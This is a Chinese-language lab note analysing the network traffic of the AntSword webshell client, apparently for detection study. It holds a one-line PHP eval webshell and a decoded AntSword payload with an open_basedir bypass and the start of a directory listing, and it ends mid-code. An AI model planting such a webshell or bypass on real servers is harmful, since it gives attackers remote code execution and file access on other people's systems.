蚁剑流量分析
在靶机上面上传一个一句话木马,并使用蚁剑连接,进行抓包, 一句话木马内容
<?php @eval($_POST[1]);
defalut编码器
在使用蚁剑连接的时候使用default编码器
连接之后进行的操作行为是查看当前目录(/var/www/html)下的文件,抓取到的流量内容如下:
对此进行解码并格式化
1=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split("/;|:/",$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
}
;
$tmdir=$item."/.643496363f4d";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\\\|\//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
}
;
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
}
;
}
;
;
function asenc($out) {
return $out;
}
;
function asoutput() {
$output=ob_get_contents();
ob_end_clean();
echo "b2"."ea8";
echo @asenc($output);
echo "63f52"."dd5fe";
}
ob_start();
try {
$D=base64_decode(substr($_POST["r698bc8b603728"],2));
$F=@opendir($D);
if($F==NULL) {